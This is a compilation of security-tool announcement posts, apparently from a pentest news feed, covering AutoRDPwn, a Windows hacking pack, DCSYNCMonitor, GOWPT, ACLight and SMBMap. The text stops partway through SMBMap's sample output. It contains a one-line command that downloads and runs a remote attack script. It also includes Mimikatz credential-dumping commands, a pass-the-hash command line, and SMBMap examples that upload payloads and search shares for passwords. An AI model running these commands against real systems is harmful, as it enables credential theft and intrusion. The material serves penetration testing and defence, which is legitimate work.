AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.5• New ninja style icon!• Automatic cleaning of Powershell history after execution• Now all dependencies are downloaded from the same repository• Many errors and bugs fixed• UAC & AMSI bypass in 64-bit systems• New module available: Remote Desktop Caching• New module available: Disable system logs (Invoke-Phant0m)• New module available: Sticky Keys Hacking• New available module: Remote Desktop History• New available attack: Session Hijacking (passwordless)WARNING! This attack is very intrusive and can only be used locally*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack===========Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).”pes" means "PE Scambled". It’s useful sometimes.Remote Exploits===========Windows 2000 / XP SP1MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP toohttp://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnpWindows XP/NT (beofre SP2)MS03-026 Microsoft RPC DCOM Interface Overflow (kaht2.zip)http://www.securityfocus.com/bid/8205/exploitWindows XP (SP2 and SP3) (can be used also for priv esc)MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv)https://www.exploit-db.com/exploits/7104/Windows Windows 7 and Server 2008 R2 (x64) All Service PacksMS17-010 aka "Eternal Blue"https://github.com/RiskSense-Ops/MS17-010Windows Server 2016 (DoS, may lead to exec)"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8Privilege Escalation===========First, if you have meterpreter, it may be a good idea to try "getsystem".srvcheck3.exe=====Privilege escalation for Windows XP SP2 and beforeThis can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"KiTrap0D.tar=====Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/Other ways of exploits listed=====Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.syshttps://www.exploit-db.com/exploits/18176/Windows Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) http://www.securityfocus.com/bid/45045/exploitWindows 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalationhttps://www.exploit-db.com/exploits/37064/Windows 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"https://www.exploit-db.com/exploits/37049/Windows 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm)http://foxglovesecurity.com/2016/01/16/hot-potato/Windows 10 (and before)Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmMWindows XP SP2 (and before)srvcheck3.exe – upnp service or SSDPSRV service Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.syshttps://www.exploit-db.com/exploits/18176/Windows Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) http://www.securityfocus.com/bid/45045/exploitWindows 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalationhttps://www.exploit-db.com/exploits/37064/Windows 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"https://www.exploit-db.com/exploits/37049/Windows NT/2K/XP/2K3/Vista/2K8/7/8KiTrap0D – EPATHOBJ Local Ring Exploithttps://www.exploit-db.com/exploits/11199/Windows 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm)http://foxglovesecurity.com/2016/01/16/hot-potato/Windows XP (and after).lnk exploit for receiving NetNTLM hashes remotely.https://www.youtube.com/watch?v=cuF_Ibo-mmMBackup files if contain samWindows/system32/config/SAM/WINDOWS/repair/SAMregedit.exe HKEY_LOCAL_MACHINE -> SAMTools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&AbelOtherwise just copy.Dump SAM through shadow volumeIf it can be created the database could be copied from this.Vista command: vssadmin create shadowServer 2008 command: diskshadowWindows Credentials EditorWCE / Windows Credentials Editor can recover password hashes from LSASS – http://www.ampliasecurity.com/research/wcefaq.htmlWCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). Mimikatz dumpingmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswordsmimikatz # lsadump::samCachedump aka In-memory attacks for SAM hashes / Cached Domain Credentialsfgdump.exe (contains pwdump and cachedump, can read from memory)SAM dump (hive)"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."Dump SAM, then spray hasheskeimpx (try hashes with different users, against domain accounts)http://code.google.com/p/keimpx/LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XPLSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abelhttps://github.com/CoreSecurity/impackethttp://packetstormsecurity.org/files/view/10457/lsadump2.ziphttp://www.nirsoft.net/utils/lsa_secrets_dump.htmlhttp://packetstormsecurity.org/files/view/62371/PWDumpX14.zipPassTheHash (before Windows 8.1)pth-winexe –user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmdPassTheTicket (Kerberos)mimikatz can do itDuplicate Access Tokens (if admin access token can be used, it’s win)http://sourceforge.net/projects/incognito/Token "Kidnapping"MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.htmlOther notablelo toolspsexec, smbshell, metasploit’s psexec, etchttps://github.com/BloodHoundAD/BloodHound – It allows to visualize connections in an AD domain and find fast escalation ways.To Be Added===========- http://www.nirsoft.net/ –> Stuff for dumping passwords- openvpn- evilgradeHashes (SHA256) and VirusTotal scans===========8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txtb3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exeda24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exebe4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.execa5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exeef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.pyffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exec36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.pycc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exeece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exec6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exeecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zipf706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgzdec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2ncat.exeSHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058ehttps://virustotal.com/en/file/b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e/analysis/1466258994/ncat_pes.exeSHA256: da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b https://virustotal.com/en/file/da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b/analysis/1466259528/nc110.tgzSHA256: 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976https://virustotal.com/en/file/5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976/analysis/1466258410/rdp2tcp-0.1.tar.gzSHA256: 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9https://virustotal.com/en/file/47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9/analysis/1466271163/Download WHP

Link: http://feedproxy.google.com/~r/PentestTools/~3/H6Wy8XMjNEc/whp-microsoft-windows-hacking-pack.html

DCSYNCMonitor – Monitors For DCSYNC And DCSHADOW Attacks And Create Custom Windows Events For These Events

This tool is an application/service that can be deployed on Domain controllers to alert on Domain Controller Syncronization attempts. When an attempt is detected, the tool will write an event to the Windows Event Log. These events can be correlated in a SIEM. In addition, this tool can take a list of valid DC IP’s and, in this configuration, only alert when a DC SYNC attempt comes from a non-DC ip. This tool is meant to provide Blue Teams with a way to combat DC SYNC and DC SHADOW attacks without commercial tools like Microsoft ATA or fancy IDS/IPS.Brief Youtube Video: Installation InstructionsTo install this tool, you can use either the pre-built binaries or build the tool yourself. Link for prebuilt binaries is here:32bit Service: https://github.com/shellster/DCSYNCMonitor/raw/master/Release/DCSYNCMONITORSERVICE.exe64bit Service: https://github.com/shellster/DCSYNCMonitor/raw/master/x64/Release/DCSYNCMONITORSERVICE.exeYou will need either Winpcap or Npcap installed on your domain controller. Winpcap should work, but is not recommended as the packet capture methods are not as efficient or thorough as NPcap. This tool has only been briefly tested with Winpcap.To install Npcap, downloaded the installer it from here: https://nmap.org/npcap/You should make sure that the following options are checked:Automatically start the Npcap driver at boot timeRestrict Npcap driver’s access to Administrators onlyAfter installing, you will need to reboot the domain controller.Npcap does not install the supporting library DLLs into the System’s DLL search path, so you will need to perform the following tasks after installing:copy “%WINDIR%\System32\Npcap\*.dll" "%WINDIR%\System32\"#If Applicable (32bit Service on 64bit System):copy "%WINDIR%\SYSWOW64\Npcap\*.dll" "%WINDIR%\SYSWOW64\"note: If the previous step is not completed, you will recieve errors about a missing wpcap.dll or Packet.dll when attempting to run the tool.Now copy the DCSYNCMONITOR.EXE from this project into an appropriate location. We recommend %WINDIR%\SYSTEM32 for either 32bit systems or 64bit systems with a 64bit service, or %WINDIR%\SYSWOW64 if you are using the 32bit service on a 64bit system.The tool can now be run. However, you can either run it one of two ways:Without a configuration fileIn this mode, the tool will write a DCSYNCALERT Warning event to the Windows Application Event Log everytime a new IP (not seen in the previous five minutes) attempts to perform a DC SYNC against the domain controller. This will include legitimate syncronization activities between domain controllers.With a configuration fileA configuration file called, "dc_ip_list.conf" can be placed in the same directory as the tool. If this file exists, it should contain one IPv4 (or long form IPv6) address per line. The tool will ingest this list on start-up. In this mode, no events will be written for DC Sync attempts from matching IP addresses. However, if a DC Sync attempt occurs from any other IP address, a DCSYNCALERT Error event will be written to the Windows Application Event Log.note Changes to the dc_ip_list.conf file will not take affect until the service is stopped and restarted.The usual way to use this tool is to install it as a service. Once the tool is placed in the correct folder, this can easily be accomplished by running:DCMONITORSERVICE.exe -installOnce you have installed the service, you will need to start it manually from the Services.msc menu or by using appropriate net or sc commands. It will auto-start on future reboots.Should you need to uninstall the service, run the following command:DCMONITORSERVICE.exe -removeFinally, to run the tool in stand-alone mode, without installing a service (especially useful for debugging):DCMONITORSERVICE.exe -standaloneScreenshotsDC SYNC Warning events occur when there is no list of valid DC IPs provided, or when a DC SYNC occurs from a valid DC IP:DC SYNC Error events occur when a list of valid DC IPs are provided and a DC SYNC occurs from any other IP address:Compilation InstructionsYou will need Visual Studio 2015 or later. The Community (free) edition is perfectly acceptable. Once you open the project, you should be able to immediately build Dev and Release versions in both 32bit and 64bit varieties. The Debug editions should not be deployed in a production environment. They spit extensive error and debugging information, including tcp packet dumps (if you uncomment the following) line in the monitor.cpp file:#ifdef _DEBUG //debug_print("TCP SRC IP: %s\nData:\n", tcppacket.source_ip.address.c_str()); //print_payload((const u_char *)tcppacket.data, tcppacket.data_length);#endifDownload DCSYNCMonitor

Link: http://feedproxy.google.com/~r/PentestTools/~3/xuhR3Vsfbng/dcsyncmonitor-monitors-for-dcsync-and.html

GOWPT – Go Web Application Penetration Test

GOWPT is the younger brother of wfuzz a swiss army knife of WAPT, it allow pentester to perform huge activity with no stress at all, just configure it and it’s just a matter of clicks.How to installTo install gowpt just type:makesudo make installUsageFrom the -h menuUsage of gowpt: -H value A list of additional headers -a string Basic authentication (user:password) -c string A list of cookies -d string POST data for request -e string A list of comma separated encoders (default “plain") -f string Filter the results -from-proxy Get the request via a proxy server -fuzz Use the built-in fuzzer -p string Use upstream proxy -ssl Use SSL -t string Template for request -threads int Number of threads (default 10) -u string URL to fuzz -w string Wordlist file -x string Extension file example.jsExamplesScan http://www.example.com and filter all 200 OK requestsgowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200"Scan http://www.example.com fuzzing vuln GET parameter looking for XSS (assume it had 200 tag with a legit request)gowpt -u "http://www.example.com/?vuln=FUZZ" -w wordlist/Injections/XSS.txt -f "tags > 200"Scan http://www.example.com fuzzing vuln POST parameter looking for XSS (assume it had 200 tag with a legit request)gowpt -u "http://www.example.com/" -d "vuln=FUZZ" -w wordlist/Injections/XSS.txt -f "tags > 200"Scan auth protected http://www.example.com and filter all 200 OK requestsgowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200" -a "user:password"Scan http://www.example.com adding header Hello: world and filter all 200 OK requestsgowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200" -H "Hello: world"Scan http://www.example.com using basic auth with user/pass guest:guestgowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -a "guest:guest"Scan http://www.example.com adding an extensiongowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -x myextension.jsScan http://www.example.com (received from proxy) and filter all 200 OK requestsgowpt –from-proxy -w wordlist/general/common.txtThen open BurpSuite send the request you want to fuzz to repeater and set an upstream proxy to 127.0.0.1:31337 when you’re ready click send, if everything was right you should see as response Request received by GOWPTExtensionExtension are an easy way to extend gowpt features, a JavaScript VM is the responsable for loading and executing extension files.JS ApiBelow a list of currently implemented API Method Number of params Description Params addCustomEncoder 2 Create a custom encoder to be used with wordlists Param1 -> EncoderName (string)Param2 -> EncoderLogic (function) panic 1 For debugging purpose crash the application Param1 -> PanicText (string) dumpResponse 2 Dump a full request/response to disk, useful to save testcase Param1 -> ResponseObject (http.Response)Param2 -> Path (string) setHTTPInterceptor 1 Create an interceptor for outgoing HTTP Request and ingoing reponses Param1 -> HTTPCallback (function) * sendRequestSync * 4 Send an HTTP Request in a synchronous way Param1 -> Method (string)Param2 -> Url (string)Param3 -> PostData (string)Param4 -> Headers (Object{Name:Value}) * PS: When using setHTTPInterceptor the callback method receive 3 paramters:A request/response objectA result objectA flag object that indicate whenever the first object is a request or a responseSince the nature of sendRequestSync it will slow down the engine due to synchronous request so use moderatelyMore info on the example extension below:example.js/** Create a custom encoder called helloworld** This encore just add the string "_helloworld" to every payload* coming from the wordlist*/addCustomEncoder("helloworld", myenc);/** Define the callback method for the helloworld encoder*/function myenc(data) { return data + "_helloword";}/** Create an HTTP interceptor** The interceptor will hook every request / response* is possible to modify request before send it, anyway the respose item* it’s just shadow copy of the one received from the server so no modification* are possible*** request_response is an object which may contains both http.Request* or http.Response , to know which on is contained check is_request flag** REMEMBER! request_response is an http.* object so you must interact with* this one just like you would do in golang!** dumpResponse is a built-in function which dump full request-response to* disk.* result is an object filled with stats about the response it contains some fields** result.tags => Number of tags in the response* result.code => HTTP Response status* result.words => Number of words in the response* result.lines => Number of lines in the response* result.chars => Number of chars in the response* result.request => Full dump of the request* result.response => Full dump of the response* result.response => The injected payload**/setHTTPInterceptor(function(request_response, result, is_request){ if(is_request){ request_response.Header.Set("Hello", "world") }else{ dumpResponse(request_response, "/tmp/dump.txt") /* * Send an HTTP request in a synchronous way * * This API accept 4 parameters: * method => GET | POST | HEAD | PUT | PATCH | UPDATE * url => The url of the HTTP service * post_data => The content of request bodyBytes * headers => A javascript dictionary {headerName => headerValue} * * The response object may be null or undefined or an http.Response from golang */ var response = sendRequestSync("GET", "http://example.com/", null, {"Fake": "Header"}) }})WordlistsWordlists comes from wfuzz project! so thanks much guys!Look&FeelEncodersBelow the list of encoders availableurl (URL encode)urlurl (Double URL encode)html (HTML encode)htmlhex (HTML hex encode)unicode (Unicode encode)hex (Hex encode)md5hash (MD5 hash)sha1hash (SHA1 hash)sha2hash (SHA2 hash)b64 (Base64 encode)b32 (Base32 encode)plain (No encoding)FiltersYou can apply filters on the following variablestags (Number of tags)lines (Number of lines of response body)words (Number of words of response body)length (Size of response body)code (HTTP status code)chars (Number of chars of response body)Download GOWPT

Link: http://feedproxy.google.com/~r/PentestTools/~3/P9MGUJOV5OU/gowpt-go-web-application-penetration.html

ACLight – PowerShell Script for Advanced Discovery of Privileged Accounts (includes Shadow Admins)

ACLight is a tool for discovering privileged accounts through advanced ACLs (Access Lists) analysis. It includes the discovery of Shadow Admins in the scanned network.The tool queries the Active Directory (AD) for its objects’ ACLs and then filters and analyzes the sensitive permissions of each one. The result is a list of domain privileged accounts in the network (from the advanced ACLs perspective of the AD). You can run the scan with just any regular user (could be non-privileged user) and it automatically scans all the domains of the scanned network forest.Just run it and check the result.You should take care of all the privileged accounts that the tool discovers for you. Especially – take care of the Shadow Admins – those are accounts with direct sensitive ACLs assignments (not through membership in other known privileged groups).Usage:Option 1:Double click on “Execute-ACLight.bat".Option 2:Open PowerShell (with -ExecutionPolicy Bypass)Go to "ACLight" main folder“Import-Module ‘.\ACLight.psm1’”“Start-ACLsAnalysis”Reading the results files:First check the – "Accounts with extra permissions.txt" file – It’s straight-forward & important list of the privileged accounts that were discovered in the scanned network."All entities with extra permissions.txt" – The file lists all the privileged entities that were discovered, it will include not only the user accounts but also other “empty” entities like empty groups or old accounts."Privileged Accounts Permissions – Final Report.csv" – This is the final summary report – in this file you will find what are the exact sensitive permissions each account has."Privileged Accounts Permissions – Irregular Accounts.csv" – Similar to the final report with only the privileged accounts that have direct assignment of ACL permissions (not through their group membership)."[Domain name] – Full Output.csv" – Raw ACLs output for each scanned domain.Scalability – scanning very large networks or networks with multiple trusted domains:The tool by default will scan automatically all the domains in the target scanned AD forest.If you want to scan a specific domain and not the others – you can just close those domains’ pop-up windows when they show up and continue regularly.If you are scanning very large network (e.g. 50,000+ users in one domain) and encounter memory limitations during the scan – there are some tips you can check in the “issue” page.References:The tool uses functions from the open source project PowerView by Will Schroeder (@harmj0y) – a great project.For more comments and questions, you can contact Asaf Hecht (@Hechtov) and CyberArk Labs.Download ACLight

Link: http://feedproxy.google.com/~r/PentestTools/~3/gha2JJZVHWU/aclight-powershell-script-for-advanced.html

SMBMap – Samba Share Enumeration Tool

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.You’ll need Impacket to use this tool:https://github.com/CoreSecurity/impacketApparently the latest Impacket requires PyASN.1:http://sourceforge.net/projects/pyasn1/Features:Pass-the-Hash SupportFile upload/download/deletePermission enumeration (writable share, meet Metasploit)Remote Command ExecutionDistrubted file content searching (new!)File name matching (with an auto downoad capability)HelpSMBMap – Samba Share Enumerator | Shawn Evans – ShawnDEvans@gmail.comoptional arguments: -h, –Help show this help message and exitMain arguments: -H HOST IP of host –host-file FILE File containing a list of hosts -u USERNAME Username, if omitted null session assumed -p PASSWORD Password or NTLM hash -s SHARE Specify a share (default C$), ex ‘C$’ -d DOMAIN Domain name (default WORKGROUP) -P PORT SMB port (default 445)Command Execution: Options for executing commands on the specified host -x COMMAND Execute a command ex. ‘ipconfig /r’Filesystem Search: Options for searching/enumerating the filesystem of the specified host -L List all drives on the specified host -R [PATH] Recursively list dirs, and files (no share\path lists ALL shares), ex. ‘C$\Finance’ -r [PATH] List contents of directory, default is to list root of all shares, ex. -r ‘C$\Documents and Settings\Administrator\Documents’ -A PATTERN Define a file name pattern (regex) that auto downloads a file on a match (requires -R or -r), not case sensitive, ex ‘(web|global).(asax|config)’ -q Disable verbose output (basically only really useful with -A)File Content Search: Options for searching the content of files -F PATTERN File content search, -F ‘[Pp]assword’ (requies admin access to execute commands, and powershell on victim host) –search-path PATH Specify drive/path to search (used with -F, default C:\Users), ex ‘D:\HR\’Filesystem interaction: Options for interacting with the specified host’s filesystem –download PATH Download a file from the remote system, ex.’C$\temp\passwords.txt’ –upload SRC DST Upload a file to the remote system ex. ‘/tmp/payload.exe C$\temp\payload.exe’ –delete PATH TO FILE Delete a remote file, ex. ‘C$\temp\msf.exe’ –skip Skip delete file confirmation promptExamples:$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1$ python smbmap.py -u jsmith -p ‘aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d’ -H 172.16.0.20$ python smbmap.py -u ‘apadmin’ -p ‘asdf1234!’ -d ACME -H 10.1.3.30 -x ‘net group “Domain Admins" /domain’Default Output:$ python smbmap.py –host-file smb-hosts.txt -u jsmith -p ‘R33nisP!nckl3’ -d ABC[+] Reading from stdin[+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.0.5:445 Name: unkown Disk Permissions —- ———– ADMIN$ READ, WRITE C$ READ, WRITE IPC$ NO ACCESS TMPSHARE READ, WRITE[+] User SMB session establishd…[+] IP: 192.168.2.50:445 Name: unkown Disk Permissions —- ———– IPC$ NO ACCESS print$ READ, WRITE My Dirs NO ACCESS WWWROOT_OLD NO ACCESS ADMIN$ READ, WRITE C$ READ, WRITECommand execution:$ python smbmap.py -u ariley -p ‘P@$$w0rd1234!’ -d ABC -x ‘net group "Domain Admins" /domain’ -H 192.168.2.50[+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.2.50:445 Name: unkown Group name Domain AdminsComment Designated administrators of the domainMembers——————————————————————————-abcadmin The command completed successfully.Non recursive path listing (ls):$ python smbmap.py -H 172.16.0.24 -u Administrator -p ‘changeMe’ -r ‘C$\Users'[+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 172.16.0.24:445 Name: 172.16.0.24 Disk Permissions —- ———– C$ READ, WRITE .Users dw–w–w– 0 Wed Apr 29 13:15:25 2015 . dw–w–w– 0 Wed Apr 29 13:15:25 2015 .. dr–r–r– 0 Wed Apr 22 14:50:36 2015 Administrator dr–r–r– 0 Thu Apr 9 14:46:57 2015 All Users dw–w–w– 0 Thu Apr 9 14:46:49 2015 Default dr–r–r– 0 Thu Apr 9 14:46:57 2015 Default User fr–r–r– 174 Thu Apr 9 14:44:01 2015 desktop.ini dw–w–w– 0 Thu Apr 9 14:46:49 2015 Public dr–r–r– 0 Wed Apr 22 13:33:01 2015 wingusFile Content Searching:$ python smbmap.py –host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p ‘NopSec1234!’ -d widgetworld -F ‘[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'[+] Finding open SMB ports….[+] User SMB session establishd on 192.168.0.99…[+] User SMB session establishd on 192.168.0.85…[+] User SMB session establishd on 192.168.0.89…[+] File search started on 1 hosts…this could take a while[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt[+] File search started on 2 hosts…this could take a while[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt[+] File search started on 3 hosts…this could take a while[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt[+] Grabbing search results, be patient, share drives tend to be big…[+] Job 1 of 3 completed on 192.168.0.85…[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt[+] Job 2 of 3 completed on 192.168.0.89…[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt[+] Job 3 of 3 completed on 192.168.0.99…[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt[+] All jobs completeHost: 192.168.0.85 Pattern: 